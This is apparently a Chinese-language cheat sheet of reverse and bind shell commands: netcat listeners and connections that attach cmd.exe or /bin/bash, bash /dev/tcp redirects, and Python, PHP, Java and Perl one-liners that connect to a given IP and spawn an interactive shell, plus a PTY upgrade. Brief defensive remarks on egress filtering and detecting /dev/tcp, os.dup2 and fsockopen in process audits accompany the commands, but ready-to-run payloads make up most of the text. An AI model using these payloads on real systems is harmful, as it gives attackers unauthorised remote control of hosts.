
反弹shell

nc反向

反向连接:目标主机主动向控制端的监听端口发起出站连接。防守侧应限制服务器的出站访问,并对 cmd.exe、bash 等 shell 进程持有网络连接的情况告警。

Linux控制端:nc -lvp 5555

目标主机:

#windows
nc 192.168.172.129 5555 -e cmd.exe
#Linux
bash -i >& /dev/tcp/192.168.172.136/6666 0>&1 /bin/bash
nc 192.168.172.136 6666 -e /bin/bash

nc正向

正向连接:目标主机自身监听端口,由控制端主动连入。防守侧可通过入站防火墙策略和对非预期监听端口的审计来发现。

目标主机:

#windows
nc -lvp 6666 -e cmd.exe
#linux
nc -lvp 6666 -e /bin/bash

控制端:nc 192.168.172.169 6666

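常用反弹shell

以下各条命令的共同点是把 shell 的标准输入、输出和错误重定向到同一个 TCP 连接。检测时可在进程命令行审计中匹配 /dev/tcp/、os.dup2、fsockopen 等特征,并关注解释器进程直接派生 /bin/sh -i 的行为。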

https://www.revshells.com

bash反弹shell

bash -i >& /dev/tcp/127.0.0.1/4444 0>&1

python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php反弹shell

php -r '$sock=fsockopen("127.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

java反弹shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/127.0.0.1/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

Perl反弹shell

perl -e 'use Socket;$i="127.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'